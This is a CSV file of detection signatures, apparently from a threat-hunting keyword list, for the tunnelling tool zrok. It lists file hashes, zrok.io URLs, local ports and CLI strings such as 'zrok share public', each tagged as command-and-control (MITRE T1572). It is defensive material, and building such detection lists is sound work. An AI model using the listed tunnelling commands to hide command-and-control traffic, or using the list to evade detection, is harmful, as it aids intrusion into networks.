"*651caf1b8d81a445db65551955dda4aa7df88a0013a81fda506bdfcfe05611b0*",".{0,1000}651caf1b8d81a445db65551955dda4aa7df88a0013a81fda506bdfcfe05611b0.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#filehash","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*9af57a343f42da2250dd4499d6dcff61a7a6395eae77eaab0ddddbe544743116*",".{0,1000}9af57a343f42da2250dd4499d6dcff61a7a6395eae77eaab0ddddbe544743116.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#filehash","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*d5be8ba1112a210428cac87772b6d7902a9b9299b9a658d03ffbc52e9d125593*",".{0,1000}d5be8ba1112a210428cac87772b6d7902a9b9299b9a658d03ffbc52e9d125593.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#filehash","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*def7512aaa595d7cad9b2e237a0ee99e778bbae0a30dd2eba75d099fc80f310f*",".{0,1000}def7512aaa595d7cad9b2e237a0ee99e778bbae0a30dd2eba75d099fc80f310f.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#filehash","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*http*api.zrok.*",".{0,1000}http.{0,1000}api\.zrok\..{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*http://*.zrok.io*",".{0,1000}http\:\/\/.{0,1000}\.zrok\.io.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*http://127.0.0.1:18080*",".{0,1000}http\:\/\/127\.0\.0\.1\:18080.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*http://127.0.0.1:9191*",".{0,1000}http\:\/\/127\.0\.0\.1\:9191.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*https://*.zrok.io*",".{0,1000}https\:\/\/.{0,1000}\.zrok\.io.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*https://zrok.*",".{0,1000}https\:\/\/zrok\..{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*openziti/zrok*",".{0,1000}openziti\/zrok.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*pastefrom b46p9j82z81f*",".{0,1000}pastefrom\sb46p9j82z81f.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*share.zrok.io*",".{0,1000}share\.zrok\.io.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*tags.zrokShareToken=*",".{0,1000}tags\.zrokShareToken\=.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*the zrok environment was successfully enabled*",".{0,1000}the\szrok\senvironment\swas\ssuccessfully\senabled.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrockify_func(*",".{0,1000}zrockify_func\(.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrok admin bootstrap*",".{0,1000}zrok\sadmin\sbootstrap.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrok configuration updated*",".{0,1000}zrok\sconfiguration\supdated.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrok environment disabled*",".{0,1000}zrok\senvironment\sdisabled.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrok share public *",".{0,1000}zrok\sshare\spublic\s.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrok share reserved *",".{0,1000}zrok\sshare\sreserved\s.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrok test loop public*",".{0,1000}zrok\stest\sloop\spublic.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrok.environment.root*",".{0,1000}zrok\.environment\.root.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrok.environment.root.Load*",".{0,1000}zrok\.environment\.root\.Load.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrok.proxy.v1*",".{0,1000}zrok\.proxy\.v1.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrok.share.CreateShare(*",".{0,1000}zrok\.share\.CreateShare\(.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrok_api.configuration*",".{0,1000}zrok_api\.configuration.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*ZROK_BACKEND_MODE*",".{0,1000}ZROK_BACKEND_MODE.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*ZROK_RESERVED_TOKEN*",".{0,1000}ZROK_RESERVED_TOKEN.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrok-share.service*",".{0,1000}zrok\-share\.service.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*zrokSvcId=*",".{0,1000}zrokSvcId\=.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"